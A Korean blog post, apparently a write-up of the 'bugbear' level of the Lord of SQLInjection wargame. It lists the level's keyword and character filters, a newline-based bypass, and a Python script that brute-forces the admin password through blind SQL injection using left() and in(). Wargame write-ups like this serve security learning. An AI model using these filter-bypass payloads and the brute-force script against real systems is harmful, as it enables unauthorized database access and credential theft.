클리어 조건
입력한 pw가 실제 admin의 패스워드와 같아야한다
필터링목록
no에서는
'(싱클쿼터) / substr / ascii / = / or / and /공백/like/16진수
pw에서는
'(싱클쿼터)
파라미터에 "no=1%0a||%0a1"을 보냈을때
admin의 pw는 8자리
import requests
url="https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no="
cookie={"PHPSESSID":"26ac9aih6v82o4nif3m0iv2h95"}
session=requests.Session()
password=""
for i in range(1,9):
for j in range(33,127):
req1=session.get(url+'2||no>1%26%26left(pw,'+str(i)+')%0ain%0a("'+password+chr(j)+'")',cookies=cookie)
if("Hello admin" in req1.text):
password += chr(j)
print(password)
break
print(chr(j)+"is not")
print(password)
영어는 소문자로 바꿔주면
'Wargame, CTF > LOS_eagle' 카테고리의 다른 글
| LOS _assassin (0) | 2019.11.08 |
|---|---|
| LOS _giant (0) | 2019.11.07 |
| LOS _darkknight (0) | 2019.10.05 |
| LOS_golem (0) | 2019.10.05 |
| LOS _skeleton (0) | 2019.10.05 |
